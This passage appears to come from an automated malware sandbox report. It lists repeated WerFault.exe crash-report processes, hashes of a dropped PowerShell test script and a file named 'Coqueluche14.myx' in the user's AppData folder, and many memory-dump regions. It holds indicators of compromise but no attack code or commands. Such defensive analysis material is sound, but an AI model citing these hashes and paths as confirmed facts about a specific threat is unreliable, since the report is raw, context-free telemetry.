                                                                                PID:1312
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3348 -ip 3348
                                                                                1⤵
                                                                                  PID:4224
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4252 -ip 4252
                                                                                  1⤵
                                                                                    PID:932
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2428 -ip 2428
                                                                                    1⤵
                                                                                      PID:1040
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2008 -ip 2008
                                                                                      1⤵
                                                                                        PID:808
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4348 -ip 4348
                                                                                        1⤵
                                                                                          PID:4392
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1008 -ip 1008
                                                                                          1⤵
                                                                                            PID:2212
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4692 -ip 4692
                                                                                            1⤵
                                                                                              PID:4248
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4660 -ip 4660
                                                                                              1⤵
                                                                                                PID:4640
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4648 -ip 4648
                                                                                                1⤵
                                                                                                  PID:5048
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1228 -ip 1228
                                                                                                  1⤵
                                                                                                    PID:1748
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1088 -ip 1088
                                                                                                    1⤵
                                                                                                      PID:4132
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4556 -ip 4556
                                                                                                      1⤵
                                                                                                        PID:4960
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2804 -ip 2804
                                                                                                        1⤵
                                                                                                          PID:3564
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2104 -ip 2104
                                                                                                          1⤵
                                                                                                            PID:3320
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1700 -ip 1700
                                                                                                            1⤵
                                                                                                              PID:2132
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1556 -ip 1556
                                                                                                              1⤵
                                                                                                                PID:2420
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1680 -ip 1680
                                                                                                                1⤵
                                                                                                                  PID:1540
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3292 -ip 3292
                                                                                                                  1⤵
                                                                                                                    PID:5100
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2260 -ip 2260
                                                                                                                    1⤵
                                                                                                                      PID:5060
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3340 -ip 3340
                                                                                                                      1⤵
                                                                                                                        PID:2360
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2436 -ip 2436
                                                                                                                        1⤵
                                                                                                                          PID:220
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2696 -ip 2696
                                                                                                                          1⤵
                                                                                                                            PID:2108
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3932 -ip 3932
                                                                                                                            1⤵
                                                                                                                              PID:516

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xevpyg1.cgr.ps1

                                                                                                                              Filesize

                                                                                                                              60B

                                                                                                                              MD5

                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                              SHA1

                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                              SHA256

                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                              SHA512

                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                            • C:\Users\Admin\AppData\Roaming\Coqueluche14.myx

                                                                                                                              Filesize

                                                                                                                              516KB

                                                                                                                              MD5

                                                                                                                              8e72b507dadf417f0f922a8cc04533d5

                                                                                                                              SHA1

                                                                                                                              d2fb1f560d46af90f009069855dc1f94179c5b6a

                                                                                                                              SHA256

                                                                                                                              84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c

                                                                                                                              SHA512

                                                                                                                              cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b

                                                                                                                            • memory/400-57-0x0000000000400000-0x0000000000424000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              144KB

                                                                                                                            • memory/2904-55-0x0000000000400000-0x0000000000478000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              480KB

                                                                                                                            • memory/3272-56-0x0000000000400000-0x0000000000462000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              392KB

                                                                                                                            • memory/3592-33-0x0000000006EF0000-0x0000000006F0A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              104KB

                                                                                                                            • memory/3592-15-0x0000000003040000-0x0000000003076000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              216KB

                                                                                                                            • memory/3592-17-0x0000000005AB0000-0x0000000005AD2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/3592-18-0x0000000005B50000-0x0000000005BB6000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/3592-19-0x00000000062D0000-0x0000000006336000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/3592-29-0x0000000006370000-0x00000000066C4000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/3592-30-0x0000000006960000-0x000000000697E000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              120KB

                                                                                                                            • memory/3592-31-0x00000000069A0000-0x00000000069EC000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              304KB

                                                                                                                            • memory/3592-32-0x0000000008190000-0x000000000880A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.5MB

                                                                                                                            • memory/3592-38-0x0000000009370000-0x000000000A320000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              15.7MB

                                                                                                                            • memory/3592-34-0x0000000007C30000-0x0000000007CC6000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              600KB

                                                                                                                            • memory/3592-35-0x0000000007BC0000-0x0000000007BE2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/3592-36-0x0000000008DC0000-0x0000000009364000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              5.6MB

                                                                                                                            • memory/3592-16-0x0000000005CA0000-0x00000000062C8000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.2MB

                                                                                                                            • memory/3824-0-0x00007FF954D03000-0x00007FF954D05000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/3824-40-0x00007FF954D03000-0x00007FF954D05000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/3824-41-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3824-50-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3824-12-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3824-11-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3824-1-0x000001FF70890000-0x000001FF708B2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/4100-48-0x00000000020E0000-0x0000000003090000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              15.7MB

                                                                                                                            • memory/4100-90-0x0000000003260000-0x0000000003279000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              100KB

                                                                                                                            • memory/4100-94-0x0000000003260000-0x0000000003279000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              100KB

                                                                                                                            • memory/4100-93-0x0000000003260000-0x0000000003279000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              100KB